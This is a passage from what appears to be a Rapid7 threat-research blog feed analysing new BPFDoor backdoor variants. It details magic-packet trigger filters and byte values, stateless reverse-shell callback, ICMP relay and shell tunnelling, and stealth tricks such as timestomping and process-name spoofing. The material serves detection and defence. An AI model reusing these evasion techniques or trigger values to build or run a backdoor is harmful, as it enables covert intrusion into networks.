<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/"
   xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom"
   version="2.0" xmlns:media="http://search.yahoo.com/mrss/">
  <channel>
    <title><![CDATA[ Labs - Rapid7 Cybersecurity Blog ]]></title>
    <description><![CDATA[Rapid7 transforms data into insight, empowering security professionals to progress and protect their organizations.]]></description>
    <link>https://www.rapid7.com/blog/</link>
    <image>
      <url>https://blog.rapid7.com/favicon.png</url>
      <title>Rapid7 Cybersecurity Blog</title>
      <link>https://www.rapid7.com/blog/</link>
    </image>
    <lastBuildDate>Fri, 03 Apr 2026 20:47:24 GMT</lastBuildDate>
    <atom:link href="https://www.rapid7.com/tag/labs/rss" rel="self" type="application/rss+xml" />
    <ttl>60</ttl>
    <item>
      <title><![CDATA[New Whitepaper: Stealthy BPFDoor Variants are a Needle That Looks Like Hay]]></title>
      <description><![CDATA[<h2 style="direction: ltr;">Executive Overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Advanced persistent threats (APTs) are constantly and consistently changing tactics as network defenders plug holes in defenses. Static indicators of compromise (IoCs) for the BPFDoor have been widely deployed, forcing threat actors to get creative in their use of this particular strain of malware. What they came up with is ingenious.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>New research from Rapid7 Labs has uncovered undocumented features leading to the discovery of 7 new BPFDoor variants: a stealthy kernel-level backdoor that uses Berkeley Packet Filters (BPFs) to inspect traffic from right inside the operating system kernel. This essentially creates a silent trapdoor that can be activated by a threat actor once a “magic packet” is tunneled via stateless protocols. The malware is then able to perfectly blend into the target environment, establishing nearly undetectable persistence in global telecom infrastructure.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Our latest research continues the narrative established in our blog</span><span style='font-size: undefined;'><em> </em></span><a href="https://www.rapid7.com/blog/post/tr-bpfdoor-telecom-networks-sleeper-cells-threat-research-report/" target="_blank"><span style='font-size: undefined;'><em>BPFdoor in Telecom Networks: Sleeper Cells in the Backbone</em></span></a><span style='font-size: undefined;'>. </span><span style='font-size: undefined;'>It involves the analysis of nearly 300 samples and  identifies two primary new variants: httpShell and icmpShell. These variants represent a significant leap in operational security, utilizing stateless C2 routing and ICMP relay to bypass multi-million dollar security stacks.</span></p><h3><span style='font-size: undefined;'>Rapid7 detection and response strategy:</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 is actively tracking these variants to ensure our customers remain protected against this evolving threat through the following:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Intelligence Hub:</strong></span><span style='font-size: undefined;'> </span><span style='font-size: undefined;'>Customers with access to Rapid7’s Intelligence Hub are receiving continuous updates, including the latest intelligence, YARA rules, and Suricata detection rulesets.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Actionable guidance:</strong></span><span style='font-size: undefined;'> </span><span style='font-size: undefined;'>We have released a specialized triage script </span><span style='font-size: undefined;'>(</span><span style='font-size: undefined;'><span data-type='inlineCode'>rapid7_bpfdoor_check.sh</span></span><span style='font-size: undefined;'>) </span><span style='font-size: undefined;'>designed to identify both legacy and modern BPFDoor variants by inspecting active BPF filters and validating masqueraded processes.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Detection engineering:</strong></span><span style='font-size: undefined;'> Our detection strategy focuses on structural header anomalies, such as hardcoded ICMP sequence numbers and invalid protocol codes, rather than transient payload content.</span></p></li></ul><h2 style="direction: ltr;">The strategic shift: Beyond legacy stealth</h2><p style="direction: ltr;"><span style='font-size: undefined;'>While BPFDoor has been active for years, its codebase has evolved significantly. The threat actor continues to incorporate minor features into the original </span><a href="https://github.com/gwillgues/BPFDoor/blob/main/bpfdoor.c" target="_blank"><span style='font-size: undefined;'>codebase</span></a><span style='font-size: undefined;'> leaked in 2022, resulting in a "messy" but effective toolkit designed to hinder threat hunting. Given the significant code overlap among BPFDoor variants, we focused on the minor, easily overlooked details the TA (threat actor) added to the leaked codebase.</span></p><h3>From memory to disk</h3><p style="direction: ltr;"><span style='font-size: undefined;'>Historically, BPFDoor was known for appearing "fileless" by executing from /dev/shm and deleting itself. However, modern endpoint detection and response (EDR) tools now flag processes running from deleted inodes in temporary filesystems. Recognizing this, the developers of the httpShell variant have eliminated the /dev/shm drop. The malware now resides on disk, using a single, hard-coded process name to blend in as a normal system daemon.</span></p><h2 style="direction: ltr;">Technical analysis: httpShell vs. icmpShell</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Our research unraveled several undocumented features (some of them were</span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>not documented for nearly 5 years), leading to the discovery of two primary variants: httpShell and icmpShell.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>httpShell: The "Magic Ruler" of encapsulated traffic</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>The httpShell variant leverages kernel-level packet filters to perform validation across both IPv4 and IPv6 traffic. It uses HTTP-tunneling to extract hidden commands and features a newly discovered "Hidden IP" (HIP) field for dynamic routing.</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Kernel-level decapsulation</strong></span><span style='font-size: undefined;'>:</span><span style='font-size: undefined;'> By binding to all interfaces simultaneously, the malware forces the target’s own kernel to decapsulate complex carrier-grade tunnels like GRE or GTP. This allows the BPF filter to easily catch magic bytes hidden inside the inner packets.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>The offset evasion</strong></span><span style='font-size: undefined;'>: </span><span style='font-size: undefined;'>To survive enterprise proxies and WAFs that shift data positions, attackers use a mathematical padding scheme. They ensure their "9999" marker always lands exactly at the 26th byte offset of the inspected data, allowing the trigger to survive proxy headers.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>IPv6 limitations</strong></span><span style='font-size: undefined;'>: </span><span style='font-size: undefined;'>The filter assumes the UDP/TCP header starts exactly at byte 40 (standard empty IPv6 header). If an attacker includes IPv6 "Extension Headers," the payload is pushed further down, and the malware fails to wake up.</span></p></li></ul><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>icmpShell: The dynamic PTY tunnel</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Designed for heavily restricted environments, icmpShell tunnels interactive sessions entirely over ICMP.</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>PID-bound mutation</strong></span><span style='font-size: undefined;'>: </span><span style='font-size: undefined;'>This variant injects a dynamic BPF filter into the kernel that binds specifically to the malware's runtime Process ID (PID). Because the PID changes with every execution, the required "magic knock" signature mutates dynamically, rendering static firewall rules useless.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Multi-mode execution</strong></span><span style='font-size: undefined;'>: </span><span style='font-size: undefined;'>Beyond basic shells, it implements bidirectional ICMP tunnels, UDP and ICMP “hole-punching”, and RC4 encryption.</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>Both variants support relay over ICMP.</span></p><h2 style="direction: ltr;">Stateless C2 and the "Hidden IP"</h2><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltfb7b9673f87f434b/69ce5cab267d5e0e7979f47c/New-magic-packet-structure.png" alt="New-magic-packet-structure.png" caption="Figure 1: New magic packet structure" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="New-magic-packet-structure.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltfb7b9673f87f434b/69ce5cab267d5e0e7979f47c/New-magic-packet-structure.png" data-sys-asset-uid="bltfb7b9673f87f434b" data-sys-asset-filename="New-magic-packet-structure.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 1: New magic packet structure" data-sys-asset-alt="New-magic-packet-structure.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 1: New magic packet structure</figcaption></div></figure><p style="direction: ltr;">⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>The discovery of the magic_packet_v2 struct featuring the HIP (hidden ip field) used for relay purposes highlights the malware's operational maturity.</span></p><h3 style="direction: ltr;">Dynamic C2 routing</h3><p style="direction: ltr;"><span style='font-size: undefined;'>One of the most elegant features is the use of a -1 flag (</span><span style='font-size: undefined;'><span data-type='inlineCode'>255.255.255.255</span></span><span style='font-size: undefined;'>) in the IP field of the magic packet structure.</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Mechanism</strong></span><span style='font-size: undefined;'>: </span><span style='font-size: undefined;'>If the flag is set, the malware ignores hardcoded IPs and sends its reverse shell back to the source IP found in the headers of the packet that woke it up.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Strategic purpose</strong></span><span style='font-size: undefined;'>:</span><span style='font-size: undefined;'> This makes the attacker's controller completely stateless. Attackers can deploy from behind NAT or VPNs without needing to discover or hardcode their current external IP into the magic payload.</span></p></li></ul><h3 style="direction: ltr;">ICMP lateral movement (the relay)</h3><p></p><pre language="c">if (auth(mpacket-&gt;pass) || mpacket-&gt;hip == -1 || !mpacket-&gt;hip)</pre><p style="direction: ltr;"></p><p style="direction: ltr;"><span style='font-size: undefined;'>When the above "Gatekeeper Condition" (authentication) is false, the malware transforms the infected machine into an invisible network router.</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt1fb22bc8afca0e67/69ce5d4cd43795e2ead0385f/ICMP-relay-using-HIP-field.jpg" alt="ICMP-relay-using-HIP-field.jpg" caption="Figure 2: ICMP relay using the HIP field" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="ICMP-relay-using-HIP-field.jpg" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt1fb22bc8afca0e67/69ce5d4cd43795e2ead0385f/ICMP-relay-using-HIP-field.jpg" data-sys-asset-uid="blt1fb22bc8afca0e67" data-sys-asset-filename="ICMP-relay-using-HIP-field.jpg" data-sys-asset-contenttype="image/jpeg" data-sys-asset-caption="Figure 2: ICMP relay using the HIP field" data-sys-asset-alt="ICMP-relay-using-HIP-field.jpg" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 2: ICMP relay using the HIP field</figcaption></div></figure><p>⠀</p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>The process</strong></span><span style='font-size: undefined;'>: </span><span style='font-size: undefined;'>It extracts an internal target IP from the HIP field, rewrites the trigger flag to ICMP magic bytes (0x5572), and fires a crafted ICMP Echo Request at the internal target.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Loop prevention</strong></span><span style='font-size: undefined;'>: </span><span style='font-size: undefined;'>The malware wipes the hop IP to -1 to stop the next BPFDoor instance from forwarding the packet again.</span></p></li></ul><p></p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt4b8929a403386c6f/69ce5da41604eec835874f9a/Rapid7-icmpshell-main-logic-chart.png" alt="Rapid7-icmpshell-main-logic-chart.png" caption="Figure 3: icmpShell main logic" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Rapid7-icmpshell-main-logic-chart.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt4b8929a403386c6f/69ce5da41604eec835874f9a/Rapid7-icmpshell-main-logic-chart.png" data-sys-asset-uid="blt4b8929a403386c6f" data-sys-asset-filename="Rapid7-icmpshell-main-logic-chart.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 3: icmpShell main logic" data-sys-asset-alt="Rapid7-icmpshell-main-logic-chart.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 3: icmpShell main logic</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 set up a playground lab to test icmpShell. For this scenario, two docker containers simulating an nginx edge proxy and a victim HSS infected with icmpShell have been used, while the attacker executes the trigger sending the magic packet via the newly discovered Rapid7 BPFDoor controller. To interact with the shell we developed the python script </span><span style='font-size: undefined;'><span data-type='inlineCode'>icmpshell.py</span></span><span style='font-size: undefined;'> to ensure RC4 state is consistent across echo requests received on the attacker’s side, filtering out also heartbeat echo requests featuring an invalid ICMP code 1.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In the bottom-right pane of the video below, we see the icmpShell variant being run with strace to debug its behavior. The top-left shows the controller triggering the backdoor after entering the new “icmp” password and crafting a magic packet over HTTPS (we will break down HTTPS tunneling and the new Rapid7 controller in a future blog) using magic bytes 0x5293. On the bottom-left pane the </span><span style='font-size: undefined;'><span data-type='inlineCode'>icmpshell.py</span></span><span style='font-size: undefined;'> runs to perform the ICMP handshake and handle shell traffic.  The connection over ICMP established between the attacker machine (REMnux) and the victim HSS leverages a second BPF filter (13-BPF instructions), installed by the backdoor that uses the reverse shell PID as a fixed ICMP ID, ensuring the capture of shell-related packets. On the upper-right pane, an ICMP tcpdump capture is run.</span></p><p>⠀</p><p style="direction: ltr;">⠀</p><p><span style='font-size: undefined;'>The video ends showing that the backdoor exits after 12s of attacker inactivity, killing the connection. The tcpdump capture shows attacker traffic being sent in cleartext prepending ‘X:’ to commands while the victim response is RC4 encrypted with the key “icmp”.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Below, we can observe the tcpdump screens highlighting ICMP handshake, shell’s data encryption, attacker’s command and the usage of 1234 ICMP sequence number hardcoded in the backdoor.</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt1e624ef2e1fa1b75/69ce606be94b483f515eea7e/Rapid7-icmpShell-encryption-decryption-flow-chart.jpg" alt="Rapid7-icmpShell-encryption-decryption-flow-chart.jpg" caption="Figure 4: icmpShell encryption/decryption flow" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Rapid7-icmpShell-encryption-decryption-flow-chart.jpg" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt1e624ef2e1fa1b75/69ce606be94b483f515eea7e/Rapid7-icmpShell-encryption-decryption-flow-chart.jpg" data-sys-asset-uid="blt1e624ef2e1fa1b75" data-sys-asset-filename="Rapid7-icmpShell-encryption-decryption-flow-chart.jpg" data-sys-asset-contenttype="image/jpeg" data-sys-asset-caption="Figure 4: icmpShell encryption/decryption flow" data-sys-asset-alt="Rapid7-icmpShell-encryption-decryption-flow-chart.jpg" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 4: icmpShell encryption/decryption flow</figcaption></div></figure><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blte235abd3603fa932/69ce606c2c747bce885767b4/icmpShell-sending-initial-ICMP-hello.png" alt="icmpShell-sending-initial-ICMP-hello.png" caption="Figure 5: icmpShell sending initial ICMP hello “X:3458”" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="icmpShell-sending-initial-ICMP-hello.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blte235abd3603fa932/69ce606c2c747bce885767b4/icmpShell-sending-initial-ICMP-hello.png" data-sys-asset-uid="blte235abd3603fa932" data-sys-asset-filename="icmpShell-sending-initial-ICMP-hello.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 5: icmpShell sending initial ICMP hello “X:3458”" data-sys-asset-alt="icmpShell-sending-initial-ICMP-hello.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 5: icmpShell sending initial ICMP hello “X:3458”</figcaption></div></figure><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blted9e411627da3e74/69ce606c78b2b1a73276db6c/attacker-sending-cleartext-command-ICMP.png" alt="attacker-sending-cleartext-command-ICMP.png" caption="Figure 6: attacker sending cleartext command over ICMP prepending “X:”" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="attacker-sending-cleartext-command-ICMP.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blted9e411627da3e74/69ce606c78b2b1a73276db6c/attacker-sending-cleartext-command-ICMP.png" data-sys-asset-uid="blted9e411627da3e74" data-sys-asset-filename="attacker-sending-cleartext-command-ICMP.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 6: attacker sending cleartext command over ICMP prepending “X:”" data-sys-asset-alt="attacker-sending-cleartext-command-ICMP.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 6: attacker sending cleartext command over ICMP prepending “X:”</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>Figure 7 below shows the heartbeat payload ignored by </span><span style='font-size: undefined;'><span data-type='inlineCode'>icmpshell.py</span></span><span style='font-size: undefined;'> </span><span style='font-size: undefined;'>acting as an ICMP “hole-punching” to keep the firewall state table active.</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc8797a2b45a87fa6/69ce616205b5be6a630124ed/ICMP-hardcoded-hole-punching-heartbeat-icmpshell.png" alt="ICMP-hardcoded-hole-punching-heartbeat-icmpshell.png" caption="Figure 7: ICMP “hole-punching” heartbeat hardcoded in icmpShell" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="ICMP-hardcoded-hole-punching-heartbeat-icmpshell.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc8797a2b45a87fa6/69ce616205b5be6a630124ed/ICMP-hardcoded-hole-punching-heartbeat-icmpshell.png" data-sys-asset-uid="bltc8797a2b45a87fa6" data-sys-asset-filename="ICMP-hardcoded-hole-punching-heartbeat-icmpshell.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 7: ICMP “hole-punching” heartbeat hardcoded in icmpShell" data-sys-asset-alt="ICMP-hardcoded-hole-punching-heartbeat-icmpshell.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 7: ICMP “hole-punching” heartbeat hardcoded in icmpShell</figcaption></div></figure><h2 style="direction: ltr;">Rapid7 variants</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The research of new variants is still ongoing. At the time of writing, Rapid7 identified seven new variants featuring new magic bytes and active C2 beaconing summarized below.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Samples </span><span style='font-size: undefined;'><strong><span data-type='inlineCode'>2cc90edd9bc085f54851bed101f95ce2bace7c9a963380cfd11ea0bc60e71e0c</span></strong></span><span style='font-size: undefined;'> and </span><span style='font-size: undefined;'><strong><span data-type='inlineCode'>de472ed37e33b79e1aa37e67a680ee3a9d74628438c209543a06e916a0a86fba</span></strong></span><span style='font-size: undefined;'>, which we classify as </span><span style='font-size: undefined;'><strong>R7 variant ‘F’</strong></span><span style='font-size: undefined;'>, increase stealthiness by hiding under </span><span style='font-size: undefined;'><span data-type='inlineCode'>/var/run/user/0</span></span><span style='font-size: undefined;'>. By avoiding the usual chmod command, the attacker ensures that no "change mode" event is logged by the kernel's audit system (auditd). Since </span><span style='font-size: undefined;'><span data-type='inlineCode'>/run</span></span><span style='font-size: undefined;'> is rarely mounted with the noexec flag (unlike </span><span style='font-size: undefined;'><span data-type='inlineCode'>/tmp</span></span><span style='font-size: undefined;'>), the malware bypasses the most common local hardening measure.</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt28177f5110d54bdb/69ce61e66e737f69aece19ed/BPFDoor-running-var-run-user-0.png" alt="BPFDoor-running-var-run-user-0.png" caption="Figure 8: BPFDoor running from /var/run/user/0" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="BPFDoor-running-var-run-user-0.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt28177f5110d54bdb/69ce61e66e737f69aece19ed/BPFDoor-running-var-run-user-0.png" data-sys-asset-uid="blt28177f5110d54bdb" data-sys-asset-filename="BPFDoor-running-var-run-user-0.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 8: BPFDoor running from /var/run/user/0" data-sys-asset-alt="BPFDoor-running-var-run-user-0.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 8: BPFDoor running from /var/run/user/0</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>Most samples simply redirect output to </span><span style='font-size: undefined;'><span data-type='inlineCode'>/dev/null</span></span><span style='font-size: undefined;'>. This variant goes further by performing a total FD (File Descriptor) wipe. Note the recurring timestomping routine following the old known anti-forensics technique.</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltb478f4435630aec8/69ce7a008e8869081f36a5ff/Timestomping-full-fds-wipe.png" alt="Timestomping-full-fds-wipe.png" caption="Figure 9: Timestomping and full fds wipe" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Timestomping-full-fds-wipe.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltb478f4435630aec8/69ce7a008e8869081f36a5ff/Timestomping-full-fds-wipe.png" data-sys-asset-uid="bltb478f4435630aec8" data-sys-asset-filename="Timestomping-full-fds-wipe.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 9: Timestomping and full fds wipe" data-sys-asset-alt="Timestomping-full-fds-wipe.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 9: Timestomping and full fds wipe</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>R7 variant ‘F’ exhibits a 26</span><span style='font-size: undefined;'><strong>-</strong></span><span style='font-size: undefined;'>BPF instruction filter featuring new magic bytes. Rapid7 developed a tool to extract BPF bytecode logic and identify variant-specific features. Three samples employed previously unknown magic bytes. Below is the output summarizing the filtering logic (Figure 10: </span><span style='font-size: undefined;'><strong><span data-type='inlineCode'>2cc90edd9bc085f54851bed101f95ce2bace7c9a963380cfd11ea0bc60e71e0c</span></strong></span></p><p style="direction: ltr;"><span style='font-size: undefined;'><strong><span data-type='inlineCode'>De472ed37e33b79e1aa37e67a680ee3a9d74628438c209543a06e916a0a86fba</span></strong></span><span style='font-size: undefined;'>;</span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>Figure 11</span><span style='font-size: undefined;'><strong>: </strong></span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>757e911edaf45cc135f2498c38d4db8acec39cb6aeb3a1dcc38305ab2d326fa9</strong></span></span><span style='font-size: undefined;'>).</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt545264d4680f5f7a/69ce630f6ec44e3609d53611/Rapid7-variant-F-new-magic-bytes.png" alt="Rapid7-variant-F-new-magic-bytes.png" caption="Figure 10: Rapid7 variant F new magic bytes" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Rapid7-variant-F-new-magic-bytes.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt545264d4680f5f7a/69ce630f6ec44e3609d53611/Rapid7-variant-F-new-magic-bytes.png" data-sys-asset-uid="blt545264d4680f5f7a" data-sys-asset-filename="Rapid7-variant-F-new-magic-bytes.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 10: Rapid7 variant F new magic bytes" data-sys-asset-alt="Rapid7-variant-F-new-magic-bytes.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 10: Rapid7 variant F new magic bytes</figcaption></div></figure><p>⠀</p><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>The BPF filtering can be expressed using libcap syntax:</span></p><p style="direction: ltr;"><span style='color:rgb(197, 34, 31);font-size: undefined;'></span></p><pre language="json">udp[8:2] == 0x3182 or (icmp[8:2] == 0x1051 and icmp[icmptype] == icmp-echo) or tcp[((tcp[12]&0xf0)&gt;&gt;2):2] == 0x3321</pre><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt9f598a4302a068f3/69ce63a922934a6e7744a7b9/R7-variant-F-new-magic-bytes.png" alt="R7-variant-F-new-magic-bytes.png" caption="Figure 11: Rapid7 variant F new magic bytes" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="R7-variant-F-new-magic-bytes.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt9f598a4302a068f3/69ce63a922934a6e7744a7b9/R7-variant-F-new-magic-bytes.png" data-sys-asset-uid="blt9f598a4302a068f3" data-sys-asset-filename="R7-variant-F-new-magic-bytes.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 11: Rapid7 variant F new magic bytes" data-sys-asset-alt="R7-variant-F-new-magic-bytes.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 11: Rapid7 variant F new magic bytes</figcaption></div></figure><p>⠀</p><pre language="json">udp[8:2] == 0x2048 or (icmp[8:2] == 0x1155 and icmp[icmptype] == icmp-echo) or tcp[((tcp[12]&0xf0)&gt;&gt;2):2] == 0x5433</pre><p><span style='font-size: undefined;'></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Earlier versions used </span><span style='font-size: undefined;'><span data-type='inlineCode'>SOCK_RAW</span></span><span style='font-size: undefined;'> when creating the </span><span style='font-size: undefined;'><span data-type='inlineCode'>AF_PACKET</span></span><span style='font-size: undefined;'> socket. When using </span><span style='font-size: undefined;'><span data-type='inlineCode'>SOCK_RAW</span></span><span style='font-size: undefined;'>, the kernel delivers the entire packet, including the link-layer header, while with </span><span style='font-size: undefined;'><span data-type='inlineCode'>SOCK_DGRAM</span></span><span style='font-size: undefined;'> the Ethernet header is discarded. This change directly impacts the way packets are parsed.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Multi-protocol parallel sniffing</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>One new variant sample, which we named </span><span style='font-size: undefined;'><strong>variant ‘G’</strong></span><span style='font-size: undefined;'>, utilizes a multi-threaded architecture to ensure triple-redundant capture of "wake-up" packets. The malware spawns three independent threads, each responsible for monitoring a specific transport protocol at the raw IP layer.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This is achieved by invoking the </span><span style='font-size: undefined;'><span data-type='inlineCode'>socket()</span></span><span style='font-size: undefined;'> system call with protocol-specific parameters for TCP, UDP, and ICMP:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>TCP:</strong></span><span style='font-size: undefined;'> </span><span style='font-size: undefined;'><span data-type='inlineCode'>socket(AF_INET, SOCK_RAW, IPPROTO_TCP)</span></span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>UDP:</strong></span><span style='font-size: undefined;'> </span><span style='font-size: undefined;'><span data-type='inlineCode'>socket(AF_INET, SOCK_RAW, IPPROTO_UDP)</span></span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>ICMP:</strong></span><span style='font-size: undefined;'> </span><span style='font-size: undefined;'><span data-type='inlineCode'>socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)</span></span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>The implant achieves simultaneous trigger detection across three protocols by deploying identical BPF filters on protocol-specific raw sockets. This functionality is implemented using three separate threads for protocol capture. This design is crucial: By dedicating a thread to each protocol, the malware prevents high-volume traffic in one protocol from overloading the sniffer and causing it to miss a "magic" trigger arriving via a less-trafficked protocol.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Beyond preventing packet loss, this parallel architecture provides C2 resiliency via built-in fallback channels. Because the BPF filters concurrently sniff TCP, UDP, and ICMP, the threat actor becomes highly resilient to sudden perimeter security changes. If a network defender updates an egress firewall to aggressively block anomalous ICMP or UDP traffic, the attacker can seamlessly switch to sending magic triggers over TCP.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Some samples (Figure 12: </span><span style='font-size: undefined;'><strong><span data-type='inlineCode'>ed768dd922742a597257ad684820d7562bb6be215710ec614bd041a22f3d6863</span></strong></span><span style='font-size: undefined;'>) exhibit the usage of threads and a new mutex/process name being spoofed like “hpasmlited”:</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blta42dd668f978b8fa/69ce7a6005b5be21b201259e/hpasmlited-process-name-spoofing.png" alt="hpasmlited-process-name-spoofing.png" caption="Figure 12: hpasmlited process name spoofing" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="hpasmlited-process-name-spoofing.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blta42dd668f978b8fa/69ce7a6005b5be21b201259e/hpasmlited-process-name-spoofing.png" 